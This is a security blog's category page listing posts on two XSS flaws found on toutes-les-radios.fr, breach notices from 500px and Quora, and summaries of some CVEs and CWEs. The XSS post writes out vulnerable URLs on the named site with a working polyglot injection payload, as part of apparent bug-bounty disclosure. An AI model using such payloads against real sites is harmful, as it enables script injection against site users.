Category: Security

Security is the degree of resistance to, or protection from, harm. It applies to any vulnerable and valuable asset, such as a person, dwelling, community, nation, or organization.

Double XSS

Posted on by Rbcafe

Découverte d’un double XSS J’ai découvert 2 XSS sur le site toutes-les-radios.fr Chemin : https://toutes-les-radios.fr/podcast/?radio=France%20Inter&name=PAYLOAD Charge : %3C!%27/*!%22/*!\%27/*\%22/*–!%3E%3C/Title/%3C/script/%3E%3CInput%20Type= Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter=confirm`OPENBUGBOUNTY`%20//%3E Chemin : https://toutes-les-radios.fr/?name=PAYLOAD&cover=chadafm.jpg&url= http://broadcast.infomaniak.net/chadafm-high.mp3&path=&streamid=&type=other&mtpt= Charge : %3C!%27/*!%22/*!\%27/*\%22/*–!%3E%3C/Title/%3C/script/%3E%3CInput%20Type= Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter= confirm`OPENBUGBOUNTY`%20//%3E Note : Voulant les envoyer directement par OpenBugBounty, j’ai reçu ce message A vulnerability on this domain has just been reported by another researcher. Please try again […]

500px was compromised

Posted on by Rbcafe

Our engineering team recently learned of a potential security issue affecting your 500px user account. We are taking this issue extremely seriously and have taken immediate action to address the situation and ensure the protection of our users’ data.

Read More

Quora was compromised

Posted on by Rbcafe


We are writing to let you know that we recently discovered that some user data was compromised as a result of unauthorized access to our systems by a malicious third party. We are very sorry for any concern or inconvenience this may cause. We are working rapidly to investigate the situation further and take the appropriate steps to prevent such incidents in the future.

Read More

CVE-2016-4656

Posted on by Rbcafe

CVE-2016-4656

The kernel in Apple iOS before 9.3.5 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app. (CWE-264)

Read More

CWE-200

Posted on by Rbcafe

CWE-200 An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.

CVE-2017-12939

Posted on by Rbcafe

CVE-2017-12939

A Remote Code Execution vulnerability was identified in all Windows versions of Unity Editor, e.g., before 5.3.8p2, 5.4.x before 5.4.5p5, 5.5.x before 5.5.4p3, 5.6.x before 5.6.3p1, and 2017.x before 2017.1.0p4. (CWE-20)

Read More

CWE-20

Posted on by Rbcafe

CWE-20

The product does not validate or incorrectly validates input that can affect the control flow or data flow of a program.

Read More